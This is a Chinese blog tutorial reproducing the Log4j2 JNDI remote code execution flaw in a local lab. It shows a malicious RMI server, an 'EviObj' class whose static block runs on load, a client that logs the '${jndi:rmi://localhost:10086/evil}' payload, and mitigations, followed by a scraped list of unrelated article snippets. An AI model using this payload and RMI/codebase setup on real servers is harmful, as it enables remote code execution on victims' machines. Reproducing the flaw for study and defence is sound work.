liangbo7
liangbo7

log4j2远程代码执行漏洞复现

目录

描述:

代码复现:

执行结果:

漏洞解决方案:

描述:

       本次 Apache Log4j 远程代码执行漏洞,正是由于组件存在 Java JNDI 注入漏洞:当程序将用户输入的数据记入日志时,攻击者通过构造特殊请求,来触发 Apache Log4j2 中的远程代码执行漏洞,从而利用此漏洞在目标服务器上执行任意代码。

代码复现:

JDK: jdk1.8.0_191

开发工具:ideaIU-2018.3.6.win

远程代码下载服务器:nginx-1.20.0

项目结构

log4j2远程代码执行漏洞复现_第1张图片

 rmi-server:

log4j2远程代码执行漏洞复现_第2张图片




    
        rmi
        lb
        1.0-SNAPSHOT
    
    4.0.0

    rmi-client

    rmi-client
    
    http://www.example.com

    
        UTF-8
        1.8
        1.8
    

    
        
            junit
            junit
            4.11
            test
        
        
            org.apache.logging.log4j
            log4j-api
            2.14.0
        
        
            org.apache.logging.log4j
            log4j-core
            2.14.0
        
    



package com.lb.rmi.server;

import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RmiServer
{
   public static void main( String[] args ) throws Exception
    {
      String url = "http://127.0.0.1/";
      Registry createRegistry = LocateRegistry.createRegistry(10086);
      Reference r = new Reference("EviObj","com.lb.rmi.common.EviObj",url);
      System.out.println("start rmi server");
      com.sun.jndi.rmi.registry.ReferenceWrapper rw = new com.sun.jndi.rmi.registry.ReferenceWrapper(r);
      createRegistry.bind("evil", rw);
    }
}

rmi-common:

log4j2远程代码执行漏洞复现_第3张图片




    
        rmi
        lb
        1.0-SNAPSHOT
    
    4.0.0

    rmi-common

    rmi-common
    
    http://www.example.com

    
        UTF-8
        1.8
        1.8
    

    
        
            junit
            junit
            4.11
            test
        
    



package com.lb.rmi.common;

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;

public class EviObj implements ObjectFactory {

	static {
		System.out.println("侵入代码执行");
	}

	@Override
	public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception {
		return null;
	}
}

rmi-client:

log4j2远程代码执行漏洞复现_第4张图片




    
        rmi
        lb
        1.0-SNAPSHOT
    
    4.0.0

    rmi-client

    rmi-client
    
    http://www.example.com

    
        UTF-8
        1.8
        1.8
    

    
        
            junit
            junit
            4.11
            test
        
        
            org.apache.logging.log4j
            log4j-api
            2.14.0
        
        
            org.apache.logging.log4j
            log4j-core
            2.14.0
        
    




package com.lb.rmi.client;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class RmiClient
{
	private static final Logger log = LogManager.getLogger();
	
    public static void main( String[] args ) throws Exception
    {
		//-Dcom.sun.jndi.rmi.object.trustURLCodebase=true -Dcom.sun.jndi.ldap.object.trustURLCodebase=true
		System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
		System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");
    	String info = "${jndi:rmi://localhost:10086/evil}";
       log.info(">>,{}",info);

    }
}

 远程代码下载服务器:把rmi-common侵入代码编译后拷贝到nginx资源目录下

log4j2远程代码执行漏洞复现_第5张图片

能访问下载即可

 

执行结果:

log4j2远程代码执行漏洞复现_第6张图片

漏洞解决方案:

1、临时缓解方案

  • 在jvm参数中添加 -Dlog4j2.FORMATMsgNoLookups=true
  • 系统环境变量中将FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true
  • 创建 "log4j2.component.properties" 文件,文件中增加配置 "log4j2.formatMsgNoLookups=true"

2、彻底修复方案

  • 手动删除log4j-core-*.jar中org/apache/logging/log4j/core/lookup/JndiLookup.class,重启服务即可。
  • 升级到官方提供的 log4j-2.15.0-rc2 版本

你可能感兴趣的:(安全)

  • 多云环境下的统一安全架构设计 TechVision大咖圈 安全架构多云安全合规性统一架构零信任深度防御身份管理
    关键词:多云安全、统一架构、零信任、深度防御、身份管理、威胁检测、SIEM、合规性文章目录引言:多云时代的安全挑战多云环境面临的安全挑战统一安全架构设计原则核心安全组件架构多层防护体系设计统一身份管理与访问控制安全监控与威胁检测实施策略与最佳实践总结与展望引言:多云时代的安全挑战在这个"云来云去"的时代,企业就像搬家一样,从单一的云服务商逐渐向多云架构迁移。就好比以前只在一家银行存钱,现在为了"不
  • 老鼠记者之神勇鼠者胜海盗猫 读后感 可愛的小秋
    杰罗尼摩•斯蒂顿出生在一个老鼠导的描述成,他非常善良,他是《鼠民公报》给老板。他很讨厌旅行,但每次总被别人拉走。这一次,他和他的妹妹菲、表弟赖皮和小侄儿本杰明一起踏上了航海的旅途。他们而且还打败了海盗猫,带回了许多东西安全的回到了家。在这本书里,我很喜欢本杰明。从书中得知,本杰明是一个善于思考、现学现用的一个小老鼠。他也很喜欢看书,许多都是从书里的知识得到的办法。而菲和赖皮去本杰明截然不同,他们旅
  • 酒厂生产信息化系统方案 liu854046222 技术解决方案大数据人工智能
    一、背景目标白酒作为中国传统的高度酒精饮料,其生产过程复杂且历史悠久。随着消费者对高品质白酒的需求不断增长,以及食品安全和质量监管的日益严格,酒厂面临着提升产品品质、确保生产安全、提高生产效率和降低成本的多重挑战。为了满足市场需求,酒厂需要对原材料进行严格分析和追溯,优化生产流程,并通过数据收集和分析来持续改进生产工艺。目标:原材料优化:通过对原料的深入分析,选择最佳的原料组合,确保白酒的独特风味
  • 基于SASE的现代化网络安全架构 TechVision大咖圈 web安全SASE网络安全架构零信任SD-WAN云安全数字化转型
    关键词:SASE、网络安全架构、零信任、SD-WAN、云安全、数字化转型文章目录引言:网络安全的新时代传统网络架构的"痛点"SASE:安全与网络的完美融合SASE架构核心组件解析SASEvs传统架构对比SASE实施策略与最佳实践真实案例:某企业SASE转型未来展望与发展趋势引言:网络安全的新时代还记得几年前,企业的IT架构就像一座城堡,高墙围绕,护城河环绕,所有人都在城堡内安全工作。但现在呢?员工
  • 3D TOF 安全防护传感器 Laurel Vision 3DTOF3d安全计算机视觉
    背景3DTOF安全防护传感器是一种先进的传感器技术,主要用于工业自动化、物流仓储、机器人应用等领域。基于3DToF原理,即飞行时间法的传感器,通过测量光脉冲从发射到接收的时间来计算物体与传感器之间的距离,从而获取三维空间信息,实现立体成像。立体安全传感器功能特性:空间安全防护:相比传统二维区域防护,三维立体具有更高安全性和灵活性。高精度:相比激光雷达精度更高,重复精度可达毫米级。简便软件设置
  • OracleERP云软件二次开发:业务流程管理与自定义教程 kkchenjj 工业软件二次开发全集工业软件ERP数据库开发语言
    OracleERP云软件二次开发:业务流程管理与自定义教程OracleERP云平台概览OracleERP云平台架构OracleERPCloud采用了一种多层架构设计,旨在提供高度可扩展、安全且灵活的云解决方案。其架构主要分为以下几个层次:用户界面层:提供直观的用户界面,支持多种设备访问,包括桌面、平板和手机。这一层利用了现代Web技术,如HTML5、CSS3和JavaScript,确保了良好的用户
  • 2021,零日漏洞最疯狂的一年 GoUpSec
    2021年,零日漏洞的数量增长了一倍,价格增长了十倍,但攻击回报增长了百倍!零日漏洞利用,即通过以前未知的漏洞发起网络攻击的方式,是黑客手中最有价值的武器,因为这些漏洞在公开市场上的价格很轻松就能超过100万美元。近日,麻省理工科技评论走访了多个数据库、安全研究人员和网络安全公司,发现今年网络安全防御者的人数达到了有史以来的最高水平,但零日漏洞的数量也创下了新的记录。根据零日漏洞追踪项目的统计(下
  • 你喜欢这些文案吗? 唯心情思
    1.你送出去的每颗糖都去了该去的地方,其实地球是圆的,你做的好事终会回到你身上。2.万一努力的尽头,是你呢。3.城市慢慢覆上夜色,些许思考后,竟觉得这吹不出褶的平静日子也在闪光。4.你只是轻轻拍了下我的肩膀,我那些憋住眼泪的努力全白费了。5.我从来是很黯淡的人,是你给了我满天星光。6.恰好那天心情不好,恰好那天你睡得很早恰好那天我没有安全感,恰好我需要你的时候你不在。7.能遇到一个可以分享快乐的人
  • Apache与Nginx服务器区别简述 camellia_halo_
    Apache与Nginx服务器区别1)nginx和apache的软件底层架构不一样。①:Nginx的并发性要比apache好很多;②:nginx属于轻量级服务器软件,apache属于重量级软件;③:nginx在处理静态页的效率要比apache好很多,apache在处理动态页面上的效率要比nginx高④:apache在安全性要比nginx要好。因此有一种不常用的组合:lnamp。2)运行模式不同的。
  • 约练分享+小组复盘 然子_50bd
    中原焦点团队李明然中(15)坚持分享第752天(2021.4.13)约练总第310(咨58)次本周约练6次咨2BOX3观1下午第一场约练,我是观察员。感受到来访者老师的真诚、畅开和正直,也感受到咨询师老师的谦虚、中立和好奇。用咨询师的话说就是没用到多少技术,只是贴着来访者,陪着他聊。来访者的反馈却是梳理的非常清晰了。真的是倾诉即疗愈,来访者才是解决他自己问题的专家。作为咨询师要为来访者营造一种安全
  • 2021-09-15 文娟love
    2021-09-14捉对练习来访者学习分享议题:面对父母言语互相攻击自己从沉默到爆炸想探索自己并处理情绪老师先是提醒我准备温水、纸巾、垃圾桶、两把椅子、是否在安全的空间,照顾好自己。先通过深呼吸放松进入潜意识看到小学的自己在父母吵架时想到赶快长大逃离这个地方,我头部是发懵的,辅导老师引导我与小时候自己对话,同时感到心口的左下方有针扎感觉一阵一阵疼,老师引导我找到SS点安抚,大脑一直出现的画面是前些
  • 大公司生产环境是不是都用jdk 17, 而不能用jdk 18 yzpyzp javagradle
    deepseek回答:大公司生产环境中通常优先选择JDK17而非JDK18,主要原因如下:1.‌长期支持(LTS)版本是企业首选‌JDK17是官方长期支持版本(LTS),维护周期长达8年(至2029年),提供持续的安全补丁和稳定性更新‌45。而JDK18是非LTS版本,仅提供6个月的技术支持,到期后需强制升级,无法满足企业对生产环境长期稳定性的需求‌46。2.‌兼容性与生态适配更成熟‌‌框架支持‌
  • 全面的学生成绩管理系统设计与实现 柴木头 B2B电商
    本文还有配套的精品资源,点击获取简介:学生成绩管理系统是一个教育管理工具,利用QT平台和C++语言开发,支持高校和教育机构进行学生成绩的记录、统计和分析。系统包含用户管理、课程管理、成绩录入与查询、统计分析、数据备份与恢复以及安全权限控制等核心模块。开发者需遵循良好的编程规范,进行单元测试和集成测试,确保系统的稳定性和可靠性。1.学生成绩管理系统概述系统的定义与功能学生成绩管理系统是为了简化教师和
  • 零基础搭建免费IP代理池:从原理到实战的保姆级指南 傻啦嘿哟 关于代理IP那些事儿tcp/ip网络协议网络
    目录一、代理池的核心价值与底层原理二、环境搭建全流程详解2.1开发环境准备2.2核心组件安装三、核心配置深度解析3.1配置文件精要(setting.py)3.2自定义代理源开发四、核心模块实现原理4.1调度系统架构4.2代理验证算法五、运维实战技巧5.1性能优化策略5.2故障排查手册六、安全加固方案七、扩展升级路径八、典型问题解决方案九、性能基准测试十、合规使用指南一、代理池的核心价值与底层原理在
  • 1.3温柔 拍照的小财猫
    图片发自App今天深圳的阳光️真是温暖,但这些都不及晚饭时候,若兮看我一边头发挡住视线,帮我把头发轻轻夹到耳后的那一抹温柔。今天发现一件很️意思的事,女儿的情商是不是和爸爸有关?比如说假设这个爸爸是能和女儿互动的非常好的,那么女儿的情商就会比较高,并且安全感很好。晚上和一舟师兄讨论“缘起性️”,她说我潜意识里本能的在抗拒和她交流,这会想想似乎真有那么一点,原因是什么呢?就是她每次都会问我一些猝不及
  • kotlin 泛型 luoj_616 Kotlinkotlinandroidjava
    一、泛型使用泛型,即"参数化类型",将类型参数化,可以用在类,接口,函数上。与Java一样,Kotlin也提供泛型,为类型安全提供保证,消除类型强转的烦恼。1.1泛型的优点类型安全:通用允许仅保留单一类型的对象。泛型不允许存储其他对象。不需要类型转换:不需要对对象进行类型转换。编译时间检查:在编译时检查泛型代码,以便在运行时避免任何问题。1.2泛型类TFood类指定的泛型参数由放在一对(item:
  • Kotlin集合与空值
    我们已经学习了Kotlin中的空安全(nullsafety)。在本节中,我们将讨论如何处理集合中的空值(null),因为集合比其他数据类型更复杂。我们还将讨论如何处理可空元素时常用的便利方法。集合与空值可空集合和具有可空元素的非空集合是同一枚硬币的两面。此外,我们还需要认识到空集合和可空集合之间的区别。让我们看看四种情况:vallist=listOf()varnullableList:List?=
  • 用户系统的架构设计与实现策略(二) sp42a 用户管理权限RBAC
    一个用户系统除了基本的用户业务功能,还应囊括用户的权限设计及其实现。这本文中我们将探讨一下关于用户权限的设计与实现方法论。简介在构建现代应用系统的过程中,很少有设计决策会像访问控制机制那样,对安全性、可扩展性和用户体验产生如此深远的影响。很多开发团队最初会选择一个简单的RBAC(基于角色的访问控制)模型,并将授权逻辑直接写入应用代码中。然而,随着业务需求不断演进,通常需要融合RBAC、ABAC和R
  • mysql笔记17视图 程宇寒 mysql笔记视图
    mysql笔记17视图一、含义mysql5.1版本出现的新特性,本身是一个虚拟表,它的数据来自于表,通过执行时动态生成。好处:1、简化sql语句2、提高了sql的重用性3、保护基表的数据,提高了安全性二、创建createview视图名as查询语句;三、修改方式一:createorreplaceview视图名as查询语句;方式二:alterview视图名as查询语句四、删除dropview视图1,视
  • 《问心》赵又廷和毛晓彤竟然是兄妹 青瑶说
    《问心》是由黎志导演周艺飞编剧的医疗题材的剧,这部剧主要讲述了周筱风,方筱然林逸三位心脏科医生从最开始的相互不服气和看不惯到后来的相互欣赏,一起并肩作战的故事。01作为一部医疗题材的剧这部剧更加聚焦的矛盾在于,医院的规章制度和病人生命安全之间的度量衡,不同品性医生在相互合作中意见不合的处境。最典型的就是张雨熙的案例,正在工作的她突然倒下,被紧急送往医院。当时林逸判断是A型主动脉夹层,但是还需要拍片
  • 戴尔R750XS服务器Windows Server 2012 R2 管理员密码忘记,如何解决? bug菌¹ 全栈Bug调优(实战版)服务器windows运维
    本文收录于《全栈Bug调优(实战版)》专栏,主要记录项目实战过程中所遇到的Bug或因后果及提供真实有效的解决方案,希望能够助你一臂之力,帮你早日登顶实现财富自由;同时,欢迎大家关注&&收藏&&订阅!持续更新中,up!up!up!!备注:部分问题/疑难杂症搜集于互联网。全文目录:问题描述解决方案(请知悉:如下方案不保证一定适配你的问题)1.**通过“安全模式”重置管理员密码**2.**使用Windo
  • Node.js特训专栏-实战进阶:16. RBAC权限模型设计 爱分享的程序员 Node.jsnode.js安全算法前端
    欢迎来到Node.js实战专栏!在这里,每一行代码都是解锁高性能应用的钥匙,让我们一起开启Node.js的奇妙开发之旅!Node.js特训专栏主页专栏内容规划详情我将从RBAC权限模型的基础概念、核心组件讲起,详细阐述其设计原则、数据库模型设计,还会结合代码示例展示在实际开发中的实现方式,以及探讨模型的扩展与优化。RBAC权限模型设计:从理论到实战的完整方案在现代应用系统中,权限管理是保障数据安全
  • iOS如何查看电池容量?理解系统限制与开发者级能耗调试方法 2501_91590906 ios小程序uni-appiphoneandroidwebviewhttps
    在很多Android设备中,查看电池的容量、温度、电压甚至充放电速度,几乎不需要任何操作。但在iOS设备上,这些信息却要么不可见,要么非常隐晦。对用户来说,“电池最大容量87%”是一句看似清晰却又缺乏上下文的信息;对开发者来说,更需要知道的是:“我的App是否在某些设备上引发了异常耗电?”这篇文章不只是告诉你如何查电池容量,更是帮助你理解iOS的能耗监测边界,和如何在苹果生态内构建安全、有效的电池
  • iOS 抓包工具选择与配置指南 从零基础到高效调试的完整流程 HTTPwise ios小程序uni-appiphoneandroidwebviewhttps
    iOS抓包:复杂网络调试的必要技能随着移动端应用越来越依赖网络交互,iOS抓包作为核心调试工具之一,变得尤为重要。无论是调试App与后端的接口通信、排查HTTPS请求加密问题,还是定位网络连接超时、请求异常,抓包都能在关键时刻提供有效支持。然而,iOS系统的封闭性与安全机制,往往让开发者在调试过程中碰壁:证书无法安装:系统严格的证书信任机制使得常规抓包工具很难直接抓取HTTPS请求。无法配置代理:
  • 【iOS】源码阅读(六)——方法交换 名字不要太长 像我这样就好 ioscocoamacos开发语言objective-c
    文章目录方法交换什么是Method-Swizzling方法交换核心API**1.获取方法对象****2.添加/替换方法实现****3.交换方法实现****4.获取方法信息****5.修改方法实现****使用示例:完整的Method-Swizzling流程****注意事项**使用方法交换注意事项线程安全方法交换的影响范围方法交换什么是Method-Swizzling  Method-Swizzlin
  • 密码管理安全防御
    密码管理是信息安全的核心环节,其目标是通过规范密码的生成、存储、传输、验证和生命周期管理,防止未授权访问,保护用户账号和系统资源的安全。以下从核心原则、技术实践、常见问题及解决方案等方面详细说明:一、密码管理的核心原则密码管理需遵循“安全性”与“可用性”的平衡,核心原则包括:复杂性原则密码需足够复杂以抵御暴力破解(如字典攻击、brute-force攻击)。通常要求:长度至少10-12位(越长越安全
  • 博客摘录「 华为云平台-FusionSphere OpenStack 8.2.1 系统加固」2025年7月15日
    编号加固项"风险等级"加固原理/Rationale审计方法/Audit期望结果/ExpectResults加固方法/Remediation1OpenSSH加固配置1.1OpenSSH加固配置1.1.1SSH使用的版本H"OpenSSHV2版本在安全性能、方便性上有所提高,默认使用V2版本。如果用户根据实际需要采用V1版本,可登录主机将数值修改为“1”。"查看/etc/ssh/sshd_config
  • 婚姻本质上讲,就是一场合作关系 一只神奇的做设计小姐姐
    其实婚姻本质上讲,就是一场合作关系。就如《奇葩说》里的经济学家薛兆丰所讲:“结婚,就是双方拿出自己的资源,一起办家庭企业,签的是终身批发的期货合同。也许每个人的资源不一样,作用不一样,功效不一样,但一定是互相出力,实现双赢。”尤其对女性而言,想要靠结婚,得到一份终生依靠,得到一辈子的安全感,得到精神的依附,这是一件绝对不可能的事。有几句话很扎心,但很实在。那就是:其实你的另一半,也嫌你穷。其实男人
  • 工业喷涂机器人的革新:艾利特协作机器人引领人机交互新纪元 lingling009 人工智能运维大数据
    将复杂技术转化为实际价值,赋能全球产业生态在工业自动化浪潮中,喷涂作业作为关键制造环节,长期面临效率低下、质量波动和安全隐患等痛点。艾利特机器人,作为专注新一代人机交互协作场景的制造商和迅速成长的国际协作机器人龙头企业之一,致力于通过一站式解决方案,深度升级汽车、3C、新能源等行业生态。本文将基于“工业喷涂机器人”这一核心场景,剖析其痛点、转化技术参数为可感知价值,并植入真实案例,构建“基础功能→
  • eVTOL分布式电推进(DEP)适航审定探究 北京航通天下科技有限公司 低空经济eVTOL测试配套分布式
    从适航认证的角度来看,eVTOL动力系统采用分布式电推进(DEP)技术进行测试具有以下显著优势:一、提升系统冗余性与故障容限分布式电推进系统通过多个独立电机协同工作,即使部分电机失效,剩余电机仍能维持推力,保障飞行安全。这种冗余设计是适航认证中对关键系统可靠性要求的核心指标之一。例如,测试平台可模拟单个或多个电机故障场景,验证系统能否通过动态推力分配维持稳定飞行,从而满足适航对“故障安全”原则的要
  • JAVA基础 灵静志远 位运算加载Date字符串池覆盖
    一、类的初始化顺序 1 (静态变量,静态代码块)-->(变量,初始化块)--> 构造器 同一括号里的,根据它们在程序中的顺序来决定。上面所述是同一类中。如果是继承的情况,那就在父类到子类交替初始化。 二、String 1 String a = "abc"; JAVA虚拟机首先在字符串池中查找是否已经存在了值为"abc"的对象,根
  • keepalived实现redis主从高可用 bylijinnan redis
    方案说明 两台机器(称为A和B),以统一的VIP对外提供服务 1.正常情况下,A和B都启动,B会把A的数据同步过来(B is slave of A) 2.当A挂了后,VIP漂移到B;B的keepalived 通知redis 执行:slaveof no one,由B提供服务 3.当A起来后,VIP不切换,仍在B上面;而A的keepalived 通知redis 执行slaveof B,开始
  • java文件操作大全 0624chenhong java
    最近在博客园看到一篇比较全面的文件操作文章,转过来留着。 http://www.cnblogs.com/zhuocheng/archive/2011/12/12/2285290.html 转自http://blog.sina.com.cn/s/blog_4a9f789a0100ik3p.html 一.获得控制台用户输入的信息    &nbs
  • android学习任务 不懂事的小屁孩 工作
    任务 完成情况 搞清楚带箭头的pupupwindows和不带的使用 已完成 熟练使用pupupwindows和alertdialog,并搞清楚两者的区别 已完成 熟练使用android的线程handler,并敲示例代码 进行中 了解游戏2048的流程,并完成其代码工作 进行中-差几个actionbar 研究一下android的动画效果,写一个实例 已完成 复习fragem
  • zoom.js 换个号韩国红果果 oom
    它的基于bootstrap 的 https://raw.github.com/twbs/bootstrap/master/js/transition.js  transition.js模块引用顺序 <link rel="stylesheet" href="style/zoom.css"> <script src=&q
  • 详解Oracle云操作系统Solaris 11.2 蓝儿唯美 Solaris
    当Oracle发布Solaris 11时,它将自己的操作系统称为第一个面向云的操作系统。Oracle在发布Solaris 11.2时继续它以云为中心的基调。但是,这些说法没有告诉我们为什么Solaris是配得上云的。幸好,我们不需要等太久。Solaris11.2有4个重要的技术可以在一个有效的云实现中发挥重要作用:OpenStack、内核域、统一存档(UA)和弹性虚拟交换(EVS)。 
  • spring学习——springmvc(一) a-john springMVC
    Spring MVC基于模型-视图-控制器(Model-View-Controller,MVC)实现,能够帮助我们构建像Spring框架那样灵活和松耦合的Web应用程序。   1,跟踪Spring MVC的请求 请求的第一站是Spring的DispatcherServlet。与大多数基于Java的Web框架一样,Spring MVC所有的请求都会通过一个前端控制器Servlet。前
  • hdu4342 History repeat itself-------多校联合五 aijuans 数论
    水题就不多说什么了。 #include<iostream>#include<cstdlib>#include<stdio.h>#define ll __int64using namespace std;int main(){ int t; ll n; scanf("%d",&t); while(t--)
  • EJB和javabean的区别 asia007 beanejb
    EJB不是一般的JavaBean,EJB是企业级JavaBean,EJB一共分为3种,实体Bean,消息Bean,会话Bean,书写EJB是需要遵循一定的规范的,具体规范你可以参考相关的资料.另外,要运行EJB,你需要相应的EJB容器,比如Weblogic,Jboss等,而JavaBean不需要,只需要安装Tomcat就可以了   1.EJB用于服务端应用开发, 而JavaBeans
  • Struts的action和Result总结 百合不是茶 strutsAction配置Result配置
        一:Action的配置详解:      下面是一个Struts中一个空的Struts.xml的配置文件     <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE struts PUBLIC &quo
  • 如何带好自已的团队 bijian1013 项目管理团队管理团队
    在网上看到博客" 怎么才能让团队成员好好干活"的评论,觉得写的比较好。 原文如下: 我做团队管理有几年了吧,我和你分享一下我认为带好团队的几点: 1.诚信         对团队内成员,无论是技术研究、交流、问题探讨,要尽可能的保持一种诚信的态度,用心去做好,你的团队会感觉得到。 2.努力提
  • Java代码混淆工具 sunjing ProGuard
    Open Source Obfuscators ProGuard http://java-source.net/open-source/obfuscators/proguardProGuard is a free Java class file shrinker and obfuscator. It can detect and remove unused classes, fields, m
  • 【Redis三】基于Redis sentinel的自动failover主从复制 bit1129 redis
    在第二篇中使用2.8.17搭建了主从复制,但是它存在Master单点问题,为了解决这个问题,Redis从2.6开始引入sentinel,用于监控和管理Redis的主从复制环境,进行自动failover,即Master挂了后,sentinel自动从从服务器选出一个Master使主从复制集群仍然可以工作,如果Master醒来再次加入集群,只能以从服务器的形式工作。   什么是Sentine
  • 使用代理实现Hibernate Dao层自动事务 白糖_ DAOspringAOP框架Hibernate
    都说spring利用AOP实现自动事务处理机制非常好,但在只有hibernate这个框架情况下,我们开启session、管理事务就往往很麻烦。 public void save(Object obj){ Session session = this.getSession(); Transaction tran = session.beginTransaction(); try
  • maven3实战读书笔记 braveCS maven3
    Maven简介 是什么? Is a software project management and comprehension tool.项目管理工具 是基于POM概念(工程对象模型) [设计重复、编码重复、文档重复、构建重复,maven最大化消除了构建的重复] [与XP:简单、交流与反馈;测试驱动开发、十分钟构建、持续集成、富有信息的工作区]     功能:
  • 编程之美-子数组的最大乘积 bylijinnan 编程之美
    public class MaxProduct { /** * 编程之美 子数组的最大乘积 * 题目: 给定一个长度为N的整数数组,只允许使用乘法,不能用除法,计算任意N-1个数的组合中乘积中最大的一组,并写出算法的时间复杂度。 * 以下程序对应书上两种方法,求得“乘积中最大的一组”的乘积——都是有溢出的可能的。 * 但按题目的意思,是要求得这个子数组,而不
  • 读书笔记-2 chengxuyuancsdn 读书笔记
    1、反射 2、oracle年-月-日 时-分-秒 3、oracle创建有参、无参函数 4、oracle行转列 5、Struts2拦截器 6、Filter过滤器(web.xml) 1、反射 (1)检查类的结构 在java.lang.reflect包里有3个类Field,Method,Constructor分别用于描述类的域、方法和构造器。 2、oracle年月日时分秒 s
  • [求学与房地产]慎重选择IT培训学校 comsci it
          关于培训学校的教学和教师的问题,我们就不讨论了,我主要关心的是这个问题       培训学校的教学楼和宿舍的环境和稳定性问题       我们大家都知道,房子是一个比较昂贵的东西,特别是那种能够当教室的房子... &nb
  • RMAN配置中通道(CHANNEL)相关参数 PARALLELISM 、FILESPERSET的关系 daizj oraclermanfilespersetPARALLELISM
    RMAN配置中通道(CHANNEL)相关参数 PARALLELISM 、FILESPERSET的关系 转 PARALLELISM --- 我们还可以通过parallelism参数来指定同时"自动"创建多少个通道: RMAN > configure device type disk parallelism 3 ; 表示启动三个通道,可以加快备份恢复的速度。
  • 简单排序:冒泡排序 dieslrae 冒泡排序
    public void bubbleSort(int[] array){ for(int i=1;i<array.length;i++){ for(int k=0;k<array.length-i;k++){ if(array[k] > array[k+1]){
  • 初二上学期难记单词三 dcj3sjt126com sciet
    concert 音乐会 tonight 今晚 famous 有名的;著名的 song 歌曲 thousand 千 accident 事故;灾难 careless 粗心的,大意的 break 折断;断裂;破碎 heart 心(脏) happen  偶尔发生,碰巧 tourist 旅游者;观光者 science (自然)科学 marry 结婚 subject 题目;
  • I.安装Memcahce 1. 安装依赖包libevent Memcache需要安装libevent,所以安装前可能需要执行 Shell代码 收藏代码 dcj3sjt126com redis
    wget http://download.redis.io/redis-stable.tar.gz tar xvzf redis-stable.tar.gz cd redis-stable make   前面3步应该没有问题,主要的问题是执行make的时候,出现了异常。 异常一: make[2]: cc: Command not found 异常原因:没有安装g
  • 并发容器 shuizhaosi888 并发容器
       通过并发容器来改善同步容器的性能,同步容器将所有对容器状态的访问都串行化,来实现线程安全,这种方式严重降低并发性,当多个线程访问时,吞吐量严重降低。    并发容器ConcurrentHashMap       替代同步基于散列的Map,通过Lock控制。   &nb
  • Spring Security(12)——Remember-Me功能 234390216 Spring SecurityRemember Me记住我
    Remember-Me功能   目录   1.1     概述 1.2     基于简单加密token的方法 1.3     基于持久化token的方法 1.4     Remember-Me相关接口和实现
  • 位运算 焦志广 位运算
    一、位运算符C语言提供了六种位运算符: & 按位与 | 按位或 ^ 按位异或 ~ 取反 << 左移 >> 右移 1. 按位与运算 按位与运算符"&"是双目运算符。其功能是参与运算的两数各对应的二进位相与。只有对应的两个二进位均为1时,结果位才为1 ,否则为0。参与运算的数以补码方式出现。 例如:9&am
  • nodejs 数据库连接 mongodb mysql liguangsong mongodbmysqlnode数据库连接
    1.mysql 连接    package.json中dependencies加入     "mysql":"~2.7.0"    执行 npm install      在config 下创建文件 database.js    
  • java动态编译 olive6615 javaHotSpotjvm动态编译
        在HotSpot虚拟机中,有两个技术是至关重要的,即动态编译(Dynamic compilation)和Profiling。     HotSpot是如何动态编译Javad的bytecode呢?Java bytecode是以解释方式被load到虚拟机的。HotSpot里有一个运行监视器,即Profile Monitor,专门监视
  • Storm0.9.5的集群部署配置优化 roadrunners 优化storm.yaml
    nimbus结点配置(storm.yaml)信息: # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional inf
  • 101个MySQL 的调节和优化的提示 tomcat_oracle mysql
     1. 拥有足够的物理内存来把整个InnoDB文件加载到内存中——在内存中访问文件时的速度要比在硬盘中访问时快的多。   2. 不惜一切代价避免使用Swap交换分区 – 交换时是从硬盘读取的,它的速度很慢。   3. 使用电池供电的RAM(注:RAM即随机存储器)。   4. 使用高级的RAID(注:Redundant Arrays of Inexpensive Disks,即磁盘阵列
  • zoj 3829 Known Notation(贪心) 阿尔萨斯 ZOJ
    题目链接:zoj 3829 Known Notation 题目大意:给定一个不完整的后缀表达式,要求有2种不同操作,用尽量少的操作使得表达式完整。 解题思路:贪心,数字的个数要要保证比∗的个数多1,不够的话优先补在开头是最优的。然后遍历一遍字符串,碰到数字+1,碰到∗-1,保证数字的个数大于等1,如果不够减的话,可以和最后面的一个数字交换位置(用栈维护十分方便),因为添加和交换代价都是1
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他